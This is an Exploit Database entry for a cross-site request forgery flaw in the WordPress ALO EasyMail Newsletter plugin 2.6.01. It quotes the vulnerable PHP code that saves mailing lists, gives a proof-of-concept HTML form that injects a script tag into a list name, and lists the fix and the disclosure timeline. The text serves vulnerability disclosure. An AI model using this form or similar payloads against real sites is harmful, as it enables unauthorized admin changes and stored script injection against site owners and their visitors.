WordPress Plugin ALO EasyMail NewsLetter 2.6.01 – Cross-Site Request Forgery

• Exploit Database
• 13 阅读

• 作者： Mohsen Lotfi
  日期： 2016-02-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39451/

• # Exploit Title: WordPress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability
  # Software Link: https://wordpress.org/plugins/alo-easymail/
  # Affected Version: 2.6.01
  # Exploit Author: Mohsen Lotfi
  # Contact: mohsen.lotfi.all@gmail.com
  # Twitter: fox_one_fox_one
  # Date: 01-16-2016
  
  #####################
  1. Description
  #####################
  
  The plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack.
  
  script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php : 
  
  case "save_list":	// SAVE a mailing list (add or update)
  			if ( isset($_REQUEST['submit_list']) ) {
  				//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) );
  				
  				// List name	
  				$list_name	= array();
  				foreach ( $languages as $key => $lang ) {
  					if (isset($_POST['listname_'.$lang]) )	$list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang]));/* script insertion here */
  				}
  				
  				$list_available = stripslashes( trim( $_POST['elp_list_available'] ) );
  				$list_order = stripslashes( trim( $_POST['elp_list_order'] ) );
  				if ( $list_name && $list_available && is_numeric($list_order) ) {
  					$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' );
  					if ( $list_id ){ // update
  						$mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order );
  					} else { // or add a new
  						if ( empty($mailinglists) ) { // if 1st list, skip index 0
  							$mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => "");
  						}	
  						$mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order);
  					}
  					if ( alo_em_save_mailinglists ( $mailinglists ) ) {
  						unset ( $list_id );
  						unset ( $list_name );
  						unset ( $list_available );						
  						unset ( $list_order );	
  						echo '<div id="message" class="updated fade"><p>'. __("Updated", "alo-easymail") .'</p></div>';
  					} else {
  						echo '<div id="message" class="error"><p>'. __("Error during operation.", "alo-easymail") .'</p></div>';
  					}
  				} else {
  					echo '<div id="message" class="error"><p>'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'</p></div>';
  				}
  			}	
  			break;
  
  
  #####################
  2. Proof of Concept
  #####################
   
  Login as regular user then:
   
  <form method="post" action="http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php">
  <input type="hidden" name="listname_en" value="<script>alert('xss')</script>">
  <input type="hidden" name="elp_list_available" value="hidden">
  <input type="hidden" name="elp_list_order" value="0">
  <input type="hidden" name="user_ID" value="1">
  <input type="hidden" name="task" value="save_list">
  <input type="hidden" name="list_id" value="">
  <input type="submit" name="submit_list" value="Trigger!">
  </form>
  
  
  #####################
  3. Sulotion
  #####################
   
  Update to version 2.7.0
  https://wordpress.org/plugins/alo-easymail/changelog/
  
  #####################
  4. Report Timeline
  #####################
  
  01-16-2016 : Vulnerability discovered.
  01-25-2016 : Vendor notified of vulnerability.
  02-07-2016 : Vendor replied and released fixed version.